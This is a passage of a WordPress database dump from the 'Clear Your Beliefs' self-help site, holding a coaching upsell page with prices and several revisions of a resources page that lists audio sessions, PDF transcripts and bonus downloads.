(1141, 2, '2014-06-28 16:44:25', '2014-06-28 21:44:25', '[vc_row][vc_column][vc_column_text]\n<h1 style="text-align: center;">Add Coaching to Your\n<em>Clear Your Beliefs</em> Program</h1>\n&nbsp;\n<h2><b>Congratulations!  You''ve purchased the <em>Clear Your Beliefs</em> program. Now, get some personal guidance so you use it!   </b></h2>\n<b></b>We''ve noticed that most people who purchase the <strong><em>Clear Your Beliefs</em></strong> program have the intention of working through it, but something gets in the way.\n\nYou want to do the work, but there are so many distractions! Other programs, practices, and teachers. Work and family obligations. Just plain old procrastination.\n\nDoes this sound familiar?  We offer this do-it-yourself program knowing that most people can''t do it themselves.  About 1 out of 10 people can, but that leaves the rest of us needing some support.\n\nThe Coaching programs offered here are designed to help you get the most out of this impactful program.  When you use it, it works. When it sits on a shelf (or in your hard drive), nothing much happens.\n\n<em>Clear Your Beliefs</em> takes you deep inside your own subconscious mind – and this can be tricky territory to traverse. Our <strong><em>Clear Your Beliefs Coaches</em></strong> are highly trained professionals who can walk you through the most difficult terrain, and help you clear whatever is in your way. They can answer your questions, and take you even deeper into your old programming – the beliefs that really hold you back.\n\nWhen you order one of the options below, you''ll get a call from on of our staff, who will interview you about your particular needs for support. We will then assign the best coach for you, based on your needs and your location.\n\nIf at any point that coach isn''t working for you, simply let us know (by writing <a href="mailto:lion@ClearYourBeliefs.com">lion@ClearYourBeliefs.com</a>), and we''ll find a more suitable coach. We want you to be happy, productive, and excited about the journey.\n<h1>Add 4 hours of Coaching to your Program:  $525. [Value: $600!]</h1>\nThis option provides you with four hours of coaching. You are welcome to use this time at any pace you wish. For example, you can get a 8 half-hour coaching sessions, or 4 one-hour sessions. After you''ve used your 4 hours, your Coach will let you know how to order additional hours at their current rate (the current range is between $150 to $250 per hour).\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-12-hour-each-week" target="_blank" rel="noopener"><button class="btn">Enroll Now</button></a>\n<h1>Add 7 hours of Coaching to your Program:  $900. [Value: $1,050!]</h1>\nThis option provides you with a full hour of coaching for each of your 7 sessions with one of our Certified Clear Your Beliefs Coaches. You are welcome to use the hours at any pace you wish.   After your 7 hours have been used, your Coach will let you know how to order additional hours (the current range is from $150 to $250 per hour).\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Coaching-Upgrade-1-hour-each-week" target="_blank" rel="noopener"><button class="btn">Enroll Now</button></a>\n<h1>Clear Your Beliefs Program plus 7 hours of Coaching with Lion Goodman:  $1,925. [Value: $2,100!]</h1>\nYou will receive 7 full hours of coaching with Lion Goodman, creator of the <strong>Clear Your Beliefs program</strong><em>. You are welcome to use the hours at any pace you wish. (After you have used the 7 hours, additional hours are available at the $275 per hour rate when you purchase ten hours in advance for $2,750, or on an hourly basis at $300 per hour.).</em>\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/Clear-Your-Beliefs-Program-7-hours-Coaching" target="_blank" rel="noopener"><button class="btn">Enroll Now</button></a>\n\n&nbsp;[/vc_column_text][/vc_column][/vc_row]', 'Coaching', '', 'publish', 'closed', 'closed', '', 'coaching', '', '', '2018-04-30 21:28:53', '2018-05-01 02:28:53', '', 0, 'http://clearyourbeliefs.com/?page_id=1141', 0, 'page', '', 0),
(1142, 2, '2014-06-28 16:44:25', '2014-06-28 21:44:25', '<h1>Add Coaching to Your <em>Clear Your Beliefs</em> Program</h1>\r\n&nbsp;\r\n\r\n<b>If you''ve already purchased the Clear Your Beliefs program, you may find that some guidance would be a benefit.   </b>\r\n\r\n<b></b>The program takes you deep into your subconscious mind, which can sometimes be tricky territory to traverse.   Our Clear Your Beliefs Coaches are highly trained professionals who can walk you through the most difficult terrain, and help you clear whatever is in your way.  They''ll also be available to answer your questions, and take you even deeper into the process.\r\n<h6>Add 3.5 hours of Coaching to your Program:  $275.</h6>\r\nThis option provides you with a half-hour of coaching per session. You are welcome to use it at any pace you wish.   After your 3.5 hours have been used, your Coach will let you know how to order additional hours directly from them.\r\n\r\nPURCHASE NOW button\r\n<h6>Add 7 hours of Coaching to your Program:  $540.</h6>\r\nThis option provides you with a full hour of coaching per session. You are welcome to use it at any pace you wish.   After your 7 hours have been used, your Coach will let you know how to order additional hours directly from them.\r\n\r\nPURCHASE NOW button\r\n\r\n&nbsp;', 'Coaching', '', 'inherit', 'closed', 'open', '', '1141-revision-v1', '', '', '2014-06-28 16:44:25', '2014-06-28 21:44:25', '', 1141, 'http://clearyourbeliefs.com/1141-revision-v1', 0, 'revision', '', 0),
(1144, 2, '2014-06-28 17:16:32', '2014-06-28 22:16:32', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: Right-click the link and "Save As" to save it to your computer for later listening, or click the link and listen on the web now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n\r\n<strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.2.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a></strong>\r\n\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 17:16:32', '2014-06-28 22:16:32', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1145, 2, '2014-06-28 17:18:53', '2014-06-28 22:18:53', '', 'CYB Belief Self-Diagnosis Exercise 2014', '', 'inherit', 'closed', 'open', '', 'cyb-belief-self-diagnosis-exercise-2014', '', '', '2014-06-28 17:18:53', '2014-06-28 22:18:53', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf', 0, 'attachment', 'application/pdf', 0),
(1146, 2, '2014-06-28 17:19:19', '2014-06-28 22:19:19', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: Right-click the link and "Save As" to save it to your computer for later listening, or click the link and listen on the web now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n\r\n<strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise:   <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a></strong>\r\n\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 17:19:19', '2014-06-28 22:19:19', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1147, 2, '2014-06-28 17:35:09', '2014-06-28 22:35:09', '', 'CYB Belief Self-Diagnosis Exercise 2014.2', '', 'inherit', 'closed', 'open', '', 'cyb-belief-self-diagnosis-exercise-2014-2-2', '', '', '2014-06-28 17:35:09', '2014-06-28 22:35:09', '', 139, 'http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf', 0, 'attachment', 'application/pdf', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1148, 2, '2014-06-28 17:36:09', '2014-06-28 22:36:09', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: Right-click the link and "Save As" to save it to your computer for later listening, or click the link and listen on the web now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n\r\n<strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise:\r\n</strong><strong><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.pdf">CYB Belief Self-Diagnosis Exercise 2014</a>      (Part 1)\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Belief-Self-Diagnosis-Exercise-2014.21.pdf">CYB Belief Self-Diagnosis Exercise 2014.2</a> (Part 2)</strong>\r\n\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 17:36:09', '2014-06-28 22:36:09', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1149, 2, '2014-06-28 18:27:05', '2014-06-28 23:27:05', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "<strong>Course Guidebook</strong>" for suggestions on how to take yourself through the program, step-by-step.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\n&nbsp;\r\n<h6>Lion Goodman\r\nFounder</h6>\r\n<h6>Audio Recordings</h6>\r\n<span style="color: #800000;">[<strong>NOTE</strong>: Right-click the link and "Save As" to save it to your computer for later listening, or click the link and listen on the web now.]</span>\r\n\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3"><span style="color: #000000;">Session 2:  Clear Your Negative Beliefs About Who You Are</span>\r\nClear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3"><span style="color: #000000;">Session 3: Clear Your Limiting Beliefs About Your Capabilities</span>\r\nClear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3"><span style="color: #000000;">Session 4: Clear Your Outdated Beliefs About Love &amp; Relationship</span>\r\nClear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3"><span style="color: #000000;">Session 5: Clear Your Old Beliefs About Money and Work</span>\r\nClear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3"><span style="color: #000000;">Session 6: Clear Uncomfortable Beliefs About Your Body &amp; Health</span>\r\nClear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3"><span style="color: #000000;">Session 7: Clear Out the Rest of the Junk in Your BeliefCloset</span>\r\nClear Your Beliefs-07.mp3</a>\r\n\r\nBonus Call 1: Anodea Judith on Manifestating with Beliefs\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\nBonus Call 2: Carista Luminare on Love and Relationships<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">\r\nClear Your Beliefs-Bonus Call With Carista Luminare.mp3</a>\r\n\r\n<strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>The Belief Self-Diagnosis Exercise:\r\n</strong><strong><a 